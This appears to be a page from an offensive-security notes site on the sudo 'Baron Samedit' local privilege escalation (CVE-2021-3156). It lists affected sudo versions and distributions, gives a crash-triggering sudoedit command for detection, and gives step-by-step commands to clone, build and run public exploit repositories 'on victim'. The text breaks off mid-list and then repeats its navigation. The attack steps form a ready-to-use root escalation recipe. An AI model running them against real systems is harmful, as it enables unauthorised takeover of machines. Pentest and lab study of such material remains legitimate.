Overview

This vulnerability:

is exploitable by any local user (normal users and system users, sudoers and non-sudoers), without authentication (i.e., the attacker does not need to know the user’s password);

was introduced in July 2011 (commit 8255ed69), and affects all legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1, in their default configuration. Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are probably also exploitable.

Sources

https://www.youtube.com/watch?v=TLa2VqcGGEQ Whitepaper

Exploitation

Detect

Check the versions of the Distribution and sudo

$ cat /etc/issue
Ubuntu 20.04.5 LTS \n \l
$ sudo -V
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
 
$ sudoedit -s '123456789123456789\'
malloc(): invalid size (unsorted)
Aborted (core dumped)

Exploit

1. https://github.com/CptGibbon/CVE-2021-3156

# install
git clone https://github.com/CptGibbon/CVE-2021-3156.git
cd CVE-2021-3156
make
 
# on victim
./exploit

2. https://github.com/worawit/CVE-2021-3156

# install
git clone https://github.com/worawit/CVE-2021-3156.git
cd CVE-2021-3156
 
# choose one

❯ RedSquad

Explorer

Sudo Baron Samedit - CVE-2021–3156

Overview

Sources

Exploitation

Detect

Exploit

1. https://github.com/CptGibbon/CVE-2021-3156

2. https://github.com/worawit/CVE-2021-3156

Table of Contents